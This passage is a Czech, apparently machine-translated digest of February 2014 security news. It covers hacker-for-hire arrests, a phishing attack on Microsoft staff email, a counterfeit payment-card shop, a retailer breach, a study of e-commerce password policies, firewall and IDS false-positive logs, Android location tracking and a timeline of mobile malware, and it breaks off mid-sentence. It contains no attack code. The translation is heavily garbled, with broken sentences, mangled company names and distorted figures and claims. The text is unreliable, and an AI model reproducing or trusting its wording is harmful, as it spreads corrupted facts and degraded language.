Arthur Drake, 55, z Bronxu, v New Yorku, který zaplatil přibližně 1,011 dolarů, aby se e-mailového účtu hesla.
Tyto poplatky jsou produktem mezinárodní vyšetřování koordinované Federálního úřadu pro vyšetřování s ředitelstvím pro odhalování organizovaného zločinu a terorismu (DIIOCT) a ředitelství pro boj s organizovaným zločinem (DCCO) Rumunska, Ústřední úřad pro vyšetřování (CBI) ze dne Indická republika a ministerstvo veřejné bezpečnosti (MPS) v Čínské lidové republice. V Rumunsku, DCCO, pod vedením DIICOT, provedl vyhledávání tří rezidencí spojených s jednotlivcům, kteří působí na webové stránky zhackgroup.com , spyhackgroup. com , rajahackers.com , clickhack.com , ghostgroup.org a e-hackers.com . Čtyři jednotlivci byli obviněni a zadržen v souvislosti s provozem těchto webových stránek. Přibližně 1600 e-mailových účtů byly ovlivněny plánu provozovaného subjekty v Rumunsku v období mezi únorem 2011 a října 2012. Centrální úřad pro vyšetřování v Indii zatčeni Amit Tiwari pro provoz webové stránky www.hirehacker.net a www.anonymiti.com a provedli prohlídky sídel Tiwari a jeho spolupracovníků. Provozovatelé těchto dvou webových stránek je zodpovědná za získání neoprávněného přístupu k asi 935 e-mailových účtů (z toho 171 patřilo k obětem v Indii), v období od února 2011 do února 2013. MPS v Číně zatčen Ying Liu, také známý jako "Brent Liu," pro provoz webových stránek hiretohack.net . Liu je zodpovědný za získání neoprávněného přístupu k asi 300 e-mailových účtů v období mezi lednem 2012 a března 2013.
Microsoft odhaluje donucovacích dokumenty byly v poslední hack ukradený
3.2.2014 Incident
S krátkou blogu, Microsoft v pátek oznámila, že neznámé hackeři mohli přistupovat a exfiltrated informace o donucovacích žádostí o informace z mnoha napadených e-mailových účtů zaměstnanců.
Společnost má v poslední době terčem pro-Assad syrské elektronické armády (SEA), které podařilo napadnout počtu úředních blogy Microsoft, Twitter účtů a e-mailových účtů. "Pokud zjistíme, že došlo k narušení zákaznické informace vztahující se k těmto žádostem budeme přijímat vhodná opatření Z ohledem na soukromí našich zaměstnanců a zákazníků -. stejně jako citlivost dotazů činných v trestním řízení - nebudeme komentovat platnosti jakýchkoli ukradených e-mailů nebo dokumentů, " napsal Adrienne Hall, generální ředitel na důvěryhodný Computing Group společnosti Microsoft. Zatímco ona neřekla, kdo byl za všemi těmito útoky, když se vyjádřil , že všechny tyto phishingové útoky se zdají být spojené. Do té doby, SEA zřejmě potvrdily , že jsou za útokem, a řekl, že bude se zveřejněním ukradené právní dokumenty na mediální místě, aby dokázal, že to není jen činný v trestním řízení, který žádá o uživatelských dat od společnosti Microsoft. Hall bagatelizoval útok, říká, že "mnoho společností zápasí s pokusy o phishing od zločinci." Poznamenala také, že bude i nadále vzdělávat zaměstnance a provést změny, jak probíhají jejich sociální vlastnosti média, poté, co interní vyšetřování ukazuje, kde jsou slabá místa jsou.
Federálové převzít on-line padělaných karet e-shopu, zatčení jeho provozovatelů
3.2.2014 Incident
Tři muži, kteří údajně provozoval one-stop on-line obchod prodává padělané platební karty a holografické překryvy, které mají být použity zločinci, aby falešné identifikace, čelí federální obvinění v probíhajícím šetření, které již vedlo v 11 dalších zatýkání, včetně zákazníků čelí federální obvinění . Sean Roberson, 39, Palm Bay na Floridě, který údajně provozoval stránky, je obviněn ze spiknutí s cílem spáchat podvodu drátu, spiknutí pro provoz s padělaným zbožím nebo službami, a spiknutí za účelem spáchání podvodu a související činnosti v souvislosti s funkcí ověřování . nahraditelnou obvinění se vrátil dnes v západní obvod Severní Karolíny poplatků Roberson je dva spiklenci, Vinício Gonzalez, 30, v Melbourne na Floridě, a Hugo Rebaza, 31, Palm Bay, Florida spiknutí k provozu s padělaným zbožím a spiknutí ke spáchání pošty podvodu, podvodu drátu a bankovní podvod. nahrazovala Obžaloba také účtuje zákazníkovi na internetových stránkách, Nashancy Johnny Colbert, 27, Charlotte, NC, s jedním počtu spiknutí s cílem spáchat poštovní podvod, podvodu drátu a bankovní podvod. FBI a USPIS byly vyšetřuje on-line prodejna, fakeplastic.net , od ledna 2013. Roberson začal prodávat padělané karty a související položky, jako již v dubnu 2011 a zahájila fakeplastic webové stránky v červnu 2012. Roberson vlastnil a provozoval web s pomocí Gonzalez a Rebaza. Od dubna 2011 Roberson a jeho spiklenci splněny objednávky na zhruba 69.000 padělaných kreditních karet - jak reliéfní a neprolisované - více než 35000 holografické nálepky používané k výrobě padělané karty se objeví více legitimní a více než 30.000 identifikačních karet stav holografické překryvy. Objednávky - více než 3600 pozemky - byly přepravovány přes americkou poštu. Gonzalez byl primárně zodpovědný za výrobu padělků platebních karet, obalů na kontraband pro zasílání a uvádění US Express Mail obálky v e-mailu dodání do fakeplastic zákazníky. Spiklenci použít paměťové zařízení na Floridě ukládat zásoby a vyrábět padělky platebních karet a Gonzalez často navštívil paměťové jednotky k vytvoření vlastní-embosovaných karet a připravit poštovní balíky. Vymáhání práva zatčen Gonzalez 4. prosince 2013, zatímco on byl v úložného prostoru - zabavení počítačů, tiskáren, padělané karty, je razicí a další kontraband. Rebaza byl "běžec" pro trestné činnosti, který je zodpovědný za vyzvednutí balíčků, které obsahují výnosů z trestné činnosti a dodávky z mailu "drop" pro fakeplastic webových stránkách. Colbert byl pouze pro členy zákazník na webových stránkách, který umístil a dostal rozkaz padělaných platebních karet dodávaných k němu prostřednictvím pošty. Činných v trestním řízení provedeny domovní prohlídce na 3 leden 2014, na Colbert v Charlotte bydliště zadření, mimo jiné, 41 padělaných platebních karet, s vyraženým Colbert jména nebo jména jiných osob. Činných v trestním řízení také obnovit odhozenou US Express Mail obálka odeslaná z fakeplastic webových stránek. Použití konzervativní odhad ztráty 500 dolarů spojené s každé padělané platební karty (odvozené od federální trestní sazbou odhad ztráty spojené s informacemi ukradené platební karty), vymáhání práva odhaduje, že ztráty spojené jen s padělky platebních karet obchodovaných podle Roberson a jeho spiklenci na více než 34.500.000 dolar. Roberson osobně dělal více než 1,7 milionů dolarů z programu. fakeplastic web byl používán různými skupinami pachatelů trestné činnosti v celé zemi často odkazoval se na jako "mykání" nebo "hotovost" posádky. Tyto posádky koupit ukradené čísla platebních karet a související informace - odkazoval se na jako "datová stopa" nebo "skládek" - což se obvykle objevují na magnetickém proužku na zadní straně oprávněných platebních karet. Nelegální prodejci této informace se obvykle dostat přes hackování nebo skimming operace zahrnující instalaci speciálního zařízení na místech, ATM nebo point-of-prodejní terminály. Ukradl data jsou nakonec dát na prázdnou kartu a používá k výrobě neoprávněné transakce. Sofistikovanější hotovost mimo provoz pomocí custom-made padělané platební karty embosované se stejnými čísly účtů, které byly uloženy na zadní straně karty, a často získávají falešný identifikační karty, aby se snížila pravděpodobnost detekce z činných v trestním řízení. trestní podzemí se vyvinula ze zlomených, regionálních operací na trhu založeného na internetu, kde kupující a prodávající po celém světě můžete inzerovat, nákupu a přenosu ukradených dat skladby. Fakeplastic website přinesl fyzické nástrojů potřebných pro výběr hotovosti z operací ve světě e-commerce, neboť eliminuje potřebu pro posádky k nákupu drahého hardwaru. prosinci 2013 místo má více než 400 členů. Členové mají přístup k fakeplastic webové stránky a hledají na nákup padělaných platebních karet, by mohly procházet dostupné šablony padělky karet na internetových stránkách je. Členové pak mohou vybrat, zda na vstupu konkrétních informací, které mají být vyraženým na kartách, a zda chtějí další funkce ověřování -. Jako jsou holografické nálepky Najednou stránkách přijato Liberty Reserve on-line měny, ale krátce poté, co federální obvinění proti Liberty Reserve byly zveřejněny v jižní obvod New Yorku 05. 2013, fakeplastic web přestala přijímat tuto měnu a začal přijímat Bitcoin, je kryptografický založené na digitální měně. Jak je uvedeno v sekci stránek "novinky", Bitcoin byl viděn jako "bezpečné" a "anonymní" způsob platby za kontraband. FBI a US Postal Inspection Service (USPIS) převzal kontrolu nad stránek, fakeplastic.net , na 05.12.2013, a dělal více než 30 kontrolovaných dodávek objednaných materiálů - nedovolit tyto materiály k opuštění řízení v oblasti vymáhání práva. Stížnost podala proti Roberson si můžete prohlédnout zde , ale Brian Krebs má dobrou (a kratší) write-up o tom, jak orgány, podařilo se ho vázána na internetových stránkách.
Americké mega-prodejce Michaels byl pravděpodobně také byla porušena
3.2.2014 Kriminalita
Texasu usazený specialitou retailer Michaels Stores je poslední společností, která oficiálně oznámit, že to bylo cílené počítačoví podvodníci, aby šli po data z platebních karet svých zákazníků.
Žádné podrobnosti o pravděpodobném porušení dosud nebyla potvrzena, ale společnost je "úzce spolupracuje s federální vymáhání práva a vede vyšetřování s pomocí odborníků v oblasti bezpečnosti dat třetích stran, na zjištění skutečností." "I když šetření probíhá, na základě informací, které společnost získala, a ve světle široce hlášených trestných úsilí proniknout do datové systémy amerických maloobchodníků, Michaels se domnívá, že je vhodné, aby svým zákazníkům vědět, potenciální problém mohlo dojít, "uvedli v tisku zpráva zveřejněna v sobotu. "Jsme znepokojeni tím, že může být zabezpečení dat útok na Michaelse, které mohou ovlivnit informace o platebních karet našich zákazníků a jsme s agresivní opatření k určení povahy a rozsahu problému," řekl Chuck Rubin, CEO. "I když jsme to potvrdili kompromis na našich systémů, věříme, že je v nejlepším zájmu našich zákazníků, upozornit na toto potenciální problematice, aby mohli podniknout kroky, aby se ochránili, například tím, že přezkoumává své výpisy z účtu platební karty na neoprávněné náklady. " "Pokud si myslíte, že vaše platební karta může být ovlivněna měli byste ihned kontaktovat svého banku nebo vydavatele karty," uvedl Rubin v otevřeném dopise zveřejněném na stejný den. "Pokud najdeme jako součást našeho šetření, že některý z našich zákazníků byli postiženi, nabízíme ochranu identity a dohledu nad úvěrovými služby pro ně bez nákladů." Se všemi nejnovějšími odhalení o data porušení zaměřených na velké americké Maloobchodníci ( Target a Neiman Marcus ) a spekulace ten druhý jsou ovlivněny uživatelé platebních karet ve Spojených státech by měl dělat dobře, aby se vždy dávat pozor na výpisech z účtu platební karty. Bohužel, s tím, jak se věci vyvíjejí, že je to dobrý kus poradenství pro každého, kdo používá payment karty, bez ohledu na to, kde žijí.
Který e-commerce weby dělat více pro ochranu své heslo?
3.2.2014 Bezpečnost
Spotřebitelé stále více sdílejí své osobní údaje, včetně informace o platbě, s rostoucím počtem elektronických obchodů. Klíče, které chrání jejich osobní údaje jsou hesla, které používají pro tyto stránky a slabá hesla by mohly být katastrofální pro zabezpečení osobních údajů.
Dashlane Roundup hodnotí hesel z top 100 e-commerce weby v USA tím, že zkoumá 24 různých kritérií hesla, že Dashlane označila za důležité, aby on-line bezpečnosti, a udělovat nebo dokovací bodů v závislosti na tom, zda stránky splňují kritérium, nebo ne. Každé kritérium je dáno + / a - bodovou hodnotu, což vede k možnému celkové skóre mezi -100 a 100 pro každou lokalitu. Klíčová zjištění:
55% stále přijímat notoricky slabá hesla jako "123456" nebo "heslo"
51%, aby žádný pokus blokovat vstup po 10 neúspěšných pokusech o zadání (včetně Amazon, Dell, Best heslo
Koupím, Macy a Williams-Sonoma)
64% má velmi pochybné hesla postupy (příjem negativní celkové skóre ve Roundup)
61% neposkytují žádné rady o tom, jak vytvořit silné heslo při registraci a 93% neposkytují posouzení na obrazovce pevnost heslo
Pouze 10% zaznamenal nad hranicí pro dobrou politiku hesel (tj. 45 bodů nebo více v Roundup)
8 míst, včetně Toys "R" Us, J.Crew a 1-800-Flowers.com, posílat hesla ve formátu prostého textu prostřednictvím e-mailu.
Apple získal nejvyšší hodnocení a byl jediný prodejce získat perfektní skóre, zatímco Newegg, Microsoft, Chegg (svázaný pro druhé), a Target zaokrouhlí se na top 3. MLB.com, Karmaloop a Dickovi Sportovní zboží obdržel tři nejnižší skóre . Amazon, Walmart, Victoria Secret a Toys "R" Us byly také jedny z nejnižších zařadil stránkách, protože všichni pacienti dostávali skóre -35 a pod.
Tyto nálezy jsou znepokojující, zvláště když zkoumal v souvislosti s mnoha nedávných on-line bezpečnostních otázkách v hlavních maloobchodníků, jako je Starbucks. Ty naznačují, že některé z nejlepších e-commerce weby v USA neprovedou základní zásady hesel, které by mohly adekvátně chránit své osobní údaje uživatelů. Uživatelé s rizikem nebezpečí se slabou politiku hesel je, že opustí osobní údaje uživatelů zranitelný. Slabší heslo, tím snazší je pro hackery proniknout do účtu. Proto, stránky s mírnější politiky hesel opouští své uživatele vystaveni většímu riziku. Většina lokalit přijímat deset nejčastěji používaných hesel jako "123456", "111111", a dokonce i slovo "password". Dashlane také zjistil, že 62% nevyžadují kombinaci písmen a čísel, a 73% přijímám hesla s 6 znaků nebo méně. MLB dokonce umožňuje uživatelům používat slovo "baseball", jak své heslo. Kromě povolení slabá hesla, počet e-commerce weby nemají účty uživatelů po opakovaných neúspěšných pokusech o přístup k uzamčení. Četná místa, včetně Amazon a Dell, umožňuje nepřetržitý normální login pokusí i po 10 neúspěšných pokusech o zadání hesla. Jedním z nejjednodušších způsobů hackeři používají proniknout na účet je automatizovaný vstup běžně používaných hesel. Omezení přístupu k účtu po několika neúspěšných pokusech o zadání je jednoduchý způsob, jak omezit tuto taktiku. Když nad dva problémy jsou spojeny, se stává snadné pro hackery, aby přístup k mnoha účtů, protože se může opakovaně pokusit nejčastěji používaných hesel, aniž by byla blokována. Také mezi více nebezpečné praktiky je zasílání hesel ve formátu prostého textu prostřednictvím e-mailu. Naštěstí tato praxe nebyla převládající, ale studie zjistila, že několik míst, včetně Toys "R" Us, J.Crew a 1-800 -. Flowers.com, statických hesel uživatelů e-mailu "ve formátu prostého textu řešení je jednoduché , aby se jejich Politiky hesel bezpečnější, Dashlane doporučuje, aby e-commerce weby přijmout několik jednoduchých zásad:
Požadovat, aby hesla obsahovat alespoň 8 znaků a kombinace horní / malých písmen, čísel a symbolů
Blokovat přístup k účtu po 4 nezdařilo přihlášení
Poskytnout uživatelům poradenství na obrazovce o tom, jak si vybrat silné heslo při registraci
Poskytnout uživatelům s hodnocením na obrazovce síly hesla, zatímco oni se rozhodli heslo.
Všechny tyto postupy mohou být prováděny rychle a levně snadno dostupných open-source technologií. Počet míst v top 100, jako je Williams-Sonoma, Chegg a CDW, které již byly provedeny mnohé z těchto postupů. Někteří maloobchodníci mohou argumentovat, že tyto požadavky bránit uživatelský komfort, ale společnosti, jako je Apple, pravděpodobně nejznámější značky na seznamu, ukázaly, že je možné, aby se tak bezpečný a úspěšný. V každé kategorii jsme testovali, Apple implementoval 4 jednoduché zásady a postupy, doporučujeme výše. Tyto politiky za následek společnost je udělena pouze perfektní skóre v této studie. Target, Nike a Microsoft také obdržel vysoké hodnocení, protože všechny vyžadují, aby uživatelé měli bezpečná hesla, která obsahují písmena, číslice a horní kombinace / velká písmena.
Při útoku není útok
3.2.2014 Počítačový útok
Myslím, že jsem viděl, že odkazoval se na jako "X-Files Effect". Právě jste nainstalovali nový firewall nebo IDS, je to stále všechno nové a lesklé a protokoly jsou stále svěží a zajímavý. Při pohledu na protokolech, začne svítat na vás: "Jsou tam dostat mě!". Zatímco mnoho z těchto útoků jsou útoky, tam jsou také docela málo falešně pozitivních, které se obvykle zobrazují v protokolech. V tomto bodě, umožňuje rychle definovat falešné poplachy: Jedná se o benigní provoz, který je mylně považován za útok, nebo útok, který prostě nemá vliv na vás (Famous SQL Slammer útok proti hostiteli Linux).
Podívejme se na několik příkladů jsme narazili v poslední době:
abcd je neustále posílá DoS ACK odpovědi na mé síti, chtěl bych nahlásit tomuto zneužívání a naučit se, jak nahlásit zneužití v budoucnu snadněji v budoucnu, protože tento druh věcí se děje po celou dobu.
Děkujeme, že jste si udělali čas na čtení to. Níže je log za incident.
[DoS útok: ACK Scan] od zdroje: abcd, port 80, čtvrtek ledna 30,2014 14:10:02
To je e-mail jsme obdrželi přibližně jednou za měsíc. Ve většině případů je zdroj zaneprázdněn webový server, někdy CDN (Content Delivery Network) jako Akamai. Důvodem těchto záznamů je, že většina firewallů zváží připojení uzavřen, pokud není aktivita byla vidět na chvíli. Nicméně, v tomto případě, spojení je stále otevřený a webový server bude nakonec poslat další datový paket, který je následně odmítnut. To není výsledkem SYN flood útok (více o tom později) a nejsem si jistý, proč to útok DoS tento konkrétní přístroj popisky.
Pokud někdo oklamat vaši IP adresu, a používat to, aby zahájily útok DoS, pak byste měli vidět SYN ACK pakety, ne ACK pakety. Například mírně zkrácené iptables přihlášení:
SRC = abcd DST = vxyz LEN = 60 TOS = 0x00 PREC = 0x20 TTL = 49 ID = 0 DF PROTO = TCP SPT = 80 DPT = 62547 WINDOW = 2896 RES = 0x00 ACK SYN URGP = 0
Typické pro tyto protokoly: zdroj je dobře známý port serveru (80). Mohl by také být 443, 6667 či jiné porty. Cílový port je "náhodný" dočasných portů.
Ale není to jen firewally. IDS samozřejmě rádi na nás obtěžují falešných poplachů, aby nás prosit, aby správně nakonfigurovat. Ale my ne, protože IDS se všemi pravidly je možná nabídek povolených je tak mnohem bezpečnější! (Sarkasmus, pokud jste si všimnout toho ...)
Snort například má velmi elegantní funkci, plugin "citlivé údaje". To může odhalit citlivé údaje, jako jsou e-mailové adresy nebo čísla sociálního zabezpečení jsou zaslaných jasné. Zde je příklad upozornění:
[138:5:1] SENSITIVE-DATA e-mailové adresy [Klasifikace: Citlivá data] [Priorita: 2] {TCP} abcd: 80 -> vxyz: 63715
E-mailová adresa byla přijata z portu 80. Takže jinými slovy: máte přístup na webovou stránku, která obsahovala e-mailovou adresu. Asi ne, co bych uvažovat o "leak", a to zejména v případě, že webový server byl umístěn mimo mou kontrolu. Viděl jsem tento podpis vyvolat hodně na FTP a samozřejmě SMTP komunikace. Pravděpodobně stále dobrá připomínka není jistý starší protokol jako přehledným textovým ftp.
Ale podívejme se na složitější jeden:
Obnovit mimo okno [Klasifikace: Potenciálně Bad Dopravní] [Priorita: 2] {TCP} 23.202.88.93:80 -> 70.91.145.11:59867
Provoz, který vyvolal toto upozornění:
a.80> b59782: Vlajky [P.], seq 1886684918:1886685156, ack 659663868, vyhrát 7240, volby [nop, nop, TS val 1132895224, s. 605850989], délka 238
a.80> b.59782: Vlajky [F.], seq 1886685156, ack 659663869, vyhrát 7240, volby [nop, nop, TS val 1132895245, s. 605851009], délka 0
a.80> b.59782: Vlajky [R], seq 1886685157, vyhrát 0, délka 0
Jak můžete říct, pořadové číslo pro paket resetu je ve skutečnosti přímo na. To bylo opět spíše vypršelo spojení. V tomto případě, webový server byl Akamai a zdá se, že chtěli poslat další restart, pravděpodobně se ujistit, že spojení je dole a ušetřete jim některé zdroje. Připojení sama byla spuštěna "kontrola aktualizací" AV nástroje.
Což mě dostává k další oblíbené firewall falešně pozitivní:
SRC = vxyz DST = abcd LEN = 40 TOS = 0x00 PREC = 0x00 TTL = 63 ID = 49424 DF PROTO = TCP SPT = 80 DPT = 52968 WINDOW = 14600 RES = 0x00 ACK FIN URGP = 0
"FIN-ACK" je blokován přichází v tomto případě z mého webového serveru na (platnou) klienta. iptables miluje blokovat konečné FIN-ack, jak to považuje za připojení již uzavřena.
Každý dobrý falešně pozitivních pořád běží do?
Android: Připraven nástroj pro odhalení špehovacích aplikací
3.2.2014 Mobil
Nová bezpečnostní aplikace pro systém Android uživatelům ukáže, které aplikace pracují s informacemi o jejich poloze.
Za nástrojem stojí skupina výzkumníků, která chce uživatelům Androidu umožnit lépe kontrolovat vlastní data. „Všechny aplikace sice potřebují k používání geolokačních údajů povolení od Androidu. Problém je v tom, že lidé tomuto výchozímu zpřístupnění nevěnují příliš pozornosti,“ popsal současnou situaci šéf projektu Janne Lindqvist.
Stejně jako v systému iOS, i uživatelům mobilního operačního systému Android se v případě, že se některá aplikace pokusí o přístup k informacím o jejich poloze, zobrazí na displeji blikající ikona GPS. Málokdo si jí však všimne. V horším případě pak lidé vůbec nevědí, co se jim blikající ikona vlastně snaží naznačit.
Výzkumníci se proto snaží přijít s vlastním řešením, které by uživatelům dalo jasně najevo, že je jejich poloha využívána nějakou třetí stranou. Vyzkoušeli přitom několik metod včetně informování uživatele pomocí zobrazení zprávy „Aplikace xy používá vaši polohu“ na displeji chytrého zařízení.
V Androidu sice neexistuje žádný „oficiální“ způsob, jak by jedna aplikace mohla sledovat používání informací o poloze jinými aplikacemi. Vědci však objevili možnost, jak pro tento účel využít rozhraní API Android Location.
V současné chvíli výzkumníci připravují aplikaci na umístění do obchodu Google Play. Pracovně ji nazvali RutgersPrivacyApp. Oficiální název zatím nemá. Sami vývojáři prý budou rádi za každý nápad.
Aplikace zatím byla testována malou skupinou na Rutgersově univerzitě v New Jersey. Zabývají se především tím, jak lidé reagují na informaci o tom, že nějaká aplikace používá jejich polohu. Zatím se ukázalo, že uživatelé byli velmi zaskočeni tím, jaké aplikace mají zájem o polohu jejich zařízení či jak často tuto informaci zjišťují.
Je pravděpodobné, že o aplikaci bude mezi uživateli Androidu zájem. Zejména skandál kolem špehovacích aktivit americké Národní bezpečnostní agentury totiž způsobil, že se lidé více zajímají o své soukromí. Nedávno se například ukázalo, že tajné služby mají zájem o mobilní verze Facebooku, Twitteru nebo LinkedIn. Vědci z Carnegie Mellon University v Pensylvánii zase zjistili, že zdánlivě bezpečné aplikace typu Angry Birds a Dictionary.com rovněž shromažďovaly zajímavá data o svých uživatelích.
Cílová POS autor malware odhalí
2.2.2014 Viry
V neočekávaným vývojem událostí, podezřelý ruský autor BlackPOS (nebo Kaptoxa) potvrdil, že byl skutečně ten, kdo ji vytvořil. Jako připomínka: Výzkumníci z zpravodajského agregátoru InterCrawler Analyzovali měsíce příspěvků na fórech a podzemních byl si jistý, že malware byl vytvořen a uveden do prodeje někým, kdo daboval sám "ree4". Pomocí této informace jako výchozí bod, ale sledoval ho do profilu Vkontakte, který řekl, že jeho jméno bylo Rinat Shabaev, a zdálo se, že být 17-letý z Petrohradu. Jak se ukázalo, byly částečně pravdu - Rinat Shabaev dělal rozvíjet malware, ale není teenager, a on žije v Saratov, hlavního města stejnojmenné ruské regionu . 23-rok-starý Shabaev souhlasil s interview s LifeNews (via Google Translate), ve kterém vysvětlil, že on nepsal malware od nuly, ale pouze přidána funkce pro něj. Tvrdí, že malware nebyl navržen speciálně pro krádež dat, ale jako testovací nástroj pro kontrolu, zda je databáze, která data mají být zaslány, je zranitelný. Přesto připouští, že mohou být použity k trestné činnosti. On také říká, že upravený malware ve spolupráci s jiným hacker, ale říká, že neví, kdo to je, nebo kde bydlí - se s ním setkal na internetu. On nikdy neměla v úmyslu používat aplikaci sám, ale chtěl ji prodat ostatním, kteří by mohli. Na konci, říká, obrátil ji ke svému partnerovi. On je nyní hledají normální, stabilní zaměstnání, dodal.
Malware infikuje Android-běh zařízení přes PC
2.2.2014 Viry | Mobil
Vědci nedávno objevili PC trojského koně, jehož konečným cílem je ohrozit Android běžící smartphone u cíle nebo tablet s informačně-krást malware. malware v pochybnost byl nazván Droidpak. Výzkumníci společnosti Symantec se nepodařilo podělit, jak je dodán potenciálních obětí na prvním místě, ale oni vyšťoural, co to dělá. Za prvé, je to klesne škodlivý DLL a zaregistruje jako systémová služba. Pak se dotýká vzdálený server a stáhne konfigurační soubor z něj. Informace v něm obsažené umožňuje, aby v případě potřeby stáhnout škodlivý APK (Android balíčku aplikací) soubor, stejně jako i Android Debug Bridge nástroj. Ten umožňuje malware k instalaci škodlivého APK žádné přístroje založené Android obětí připojí k počítače. Po instalaci malware se snaží skrýt svou přítomnost tím, že předstírá jako "Google App Store" aplikace a na pozadí vyhledává on-line bankovní aplikace, které nainstaloval uživatel. Pokud ji najde, se snaží přesvědčit uživatele k odstranění je to tím, že falešnou záminku a snaží se je přimět ke stažení a instalaci škodlivého ekvivalent. . Netřeba dodávat, že posledně uvedené záznamy jakákoliv (bankovnictví) informace, které se vstoupil do nich Kromě toho, to může také zachytit a mazat SMS zprávy - zaslané bankou oběti jsou pravděpodobně mezi ty, které nejsou povoleny na pop-up. Tento malware kombo je v současné době zaměřuje korejské uživatele, ale to může být snadno upraven tak, aby obhlédli pro on-line bankovních aplikací bank po celém světě, jsem si představit. Dobrou zprávou je, že malware rozhodně potřebuje uživatel provést instalaci škodlivých aplikací , takže uživatelé, kteří jsou ve střehu a vědět, jak rozpoznat tento typ sociálního inženýrství nebudou se zmást to dělá. Další dobrá věc je, že vypnete ladění USB na vašem zařízení se systémem Android bude blokovat tuto infekci vektor ( přečtěte si více o tom, co režim to a proč byste měli držet zakázána, pokud nechcete používat). Konečně, s dobrou AV řešení, jak na vašem PC a váš mobilní přístroj je vždy dobrý nápad.
Při pohledu zpět na 10 let mobilního malwaru
2.2.2014 Mobil | Viry
Od Cabir na FakeDefend, poslední desetiletí vidělo číslo mobilního malwaru explodovat. V roce 2013, Fortinet FortiGuard Labs zaznamenala více než 1300 nových škodlivé aplikace denně a je v současné době sleduje více než 300 Android malware rodin a více než 400.000 škodlivé Android aplikací. Kromě naprosté nárůstem počtu, další důležitý trend si uvědomit, je, že mobilní malware následoval stejný vývoj jako PC malware, ale v mnohem rychlejším tempem. Rozšířené přijetí smartphony - a skutečnost, že mohou snadno získat přístup k platební systém (telefonní čísla se zvýšenou sazbou) - z nich dělá snadné cíle, které lze rychle generovat peníze jednou infikován. Navíc mají funkce, jako je geo-umístění, mikrofony , vestavěný GPS a kamery, které všechny umožňují mimořádně dotěrný úroveň špehování jejich vlastníků. Podobně jako počítače malware, mobilní malware rychle se vyvinul do efektivního a účinného způsobu generování hotovosti proud, a zároveň podporuje širokou škálu obchodních modelů. V následujícím chronologie, FortiGuard Labs se zaměřuje na nejvýznamnější mobilní malware v průběhu posledních 10 let, a vysvětluje, jejich role ve vývoji hrozeb. 2004: První pokus Cabir byl svět je první mobilní červ. Navrženy tak, aby infikovat Nokia Series 60, její útok ve slově "Caribe" se objeví na obrazovce infikovaných telefonů. Červ pak šíří se tím, že hledá další zařízení (telefony, tiskárny, herní konzole ...), v těsné blízkosti pomocí funkce Bluetooth telefonu. "Odborníci se domnívají, že červ byl vyvinut skupinou hackerů zvané 29A jako" proof of concept " vzhledem k jeho relativně neškodného charakteru, "řekl Axelle Apvrille, senior mobilní anti-virus výzkumník s Fortinet FortiGuard Labs. 2005: Přidání MMS do mixu CommWarrior, objevil v roce 2005, zvedl kde Cabir skončil tím, že přidá schopnost šířit se pomocí jak Bluetooth a MMS. Po instalaci na zařízení, CommWarrior by se přistupovat ke kontaktním soubor napadeného telefonu a poslat sama prostřednictvím služby MMS dopravce ke každému kontaktu. Použití MMS jako způsob propagace představil ekonomický aspekt, neboť každé zprávy MMS odeslané, majitelé telefonů by vynaložit poplatek z jejich nosiče. Ve skutečnosti, někteří operátoři si říkal, že až 3,5 procenta z jejich provozu byla zdrojů na CommWarrior, a nakonec souhlasila s proplacením oběti. virus, který také zaměřila na Symbian 60 platformu, byla hlášena ve více než 18 zemích po celé Evropě, Asie a Severní Amerika. Celkem mobilní červ infikovaných více než 115.000 mobilních zařízení a poslal více než 450.000 MMS zprávy bez vědomí obětí, osvětlení poprvé, že mobilní Červ může šířit tak rychle jako počítačový červ. "V té době, Symbian byl nejoblíbenější smartphone platformu s desítkami milionů uživatelů po celém světě, "pokračoval Apvrille. "Nicméně, cílem za CommWarrior bylo propagovat sám sebe v co největší míře a ne zisk z poplatků, které vznikly prostřednictvím zpráv MMS." 2006: Po peněz po prokázané úspěchy Cabir a CommWarrior, bezpečnostní komunita zjistil Trojan s názvem RedBrowser vychvalováním několik klíčových rozdílů z jeho předchůdců. První bylo to, že byl navržen tak, aby infikovat telefonu přes Java 2 Micro Edition (J2ME) platformy. Trojan by se prezentovat jako žádost, aby (WAP) stránky procházení Wireless Application Protocol jednodušší. Zaměřením se na všeobecně podporován Java platformu spíše než operační systém zařízení, vývojáři Trojan byli schopni zaměřit mnohem větší publikum, bez ohledu na výrobce telefonu nebo operační systém. Druhý a možná důležitější rozdíl je, že Trojan byl specificky navrženy tak, aby využít Premium Rate SMS služby. Majitel telefonu bude obvykle nebude účtován přibližně $ 5 za SMS -. Další krok směrem k využití mobilního malware jako prostředek generování hotovosti proud přidané Apvrille, "Až do vzniku RedBrowser, bezpečnostní komunita věřil, že to bylo nemožné, aby jeden kus malware mohl infikovat širokou škálu mobilních telefonů s různými operačními systémy. Využití J2ME jako útočný vektor byl důležitým mezníkem v tomto období, stejně jako používání SMS zpráv jako mechanismus penězotvorné ". 2007-2008: období přechodu přes stagnaci ve vývoji mobilních hrozeb v průběhu tohoto dvouletého období došlo k nárůstu počtu malware, který přístupné služby se zvýšenou sazbou bez vědomí majitele zařízení. 2009: Zavedení mobilní botnet na počátku roku 2009, Fortinet objevil Yxes (přesmyčka "Sexy"), kus malware za zdánlivě legitimní "Sexy View" aplikace. Yxes také měl vyznamenání za bytí certifikované aplikace Symbian, který využil vtípek v rámci Symbian ekosystému, který umožnil vývojářům "odhlásit" aplikace samotné. Jakmile infikován, mobilní telefon oběti dopředu svůj adresář do centrálního serveru. Server potom předá SMS, která obsahuje adresu URL pro každý z kontaktů. Oběti, kteří kliknou na odkaz na stažení zpráv a nainstalovat kopii malware, a proces se opakuje. šíření Yxes byla do značné míry omezena do Asie, kde je infikováno nejméně 100.000 zařízení v roce 2009. "Yxes byl další zlomový ve vývoji mobilního malwaru z několika důvodů, "řekl Apvrille. "Za prvé, je považován za první malware zaměřením na operační systém Symbian 9. Za druhé, to byl první malware poslat SMS a přístup na internet bez vědomí mobilního uživatele, vývoj považován za technologickou inovaci v malware. Konečně, a co je možná nejdůležitější, hybridní model, který je použit pro samostatně výdělečně propagovat a komunikovat se vzdáleným serverem, dal Antivirus analytici důvod se obávat, že to byl možná forewarning pro nový druh viru - botnety na mobilních telefonech. Budoucí události by později ověřit, že vnímání ". 2010: Průmyslová věk mobilní malware 2010 znamenal významný milník v historii mobilního malwaru: přechod z geograficky lokalizovaných jednotlivců nebo malých skupin, aby ve velkém měřítku, pořádané zločinci působí na celosvětovém základě . To je začátek "industrializace mobilní malware", v níž útočníci uvědomili, že mobilní malware může snadno přinést hodně peněz, což vyvolalo rozhodnutí využívat hrozby mnohem intenzivněji. Rok 2010 byl také zavedení první mobilní malware 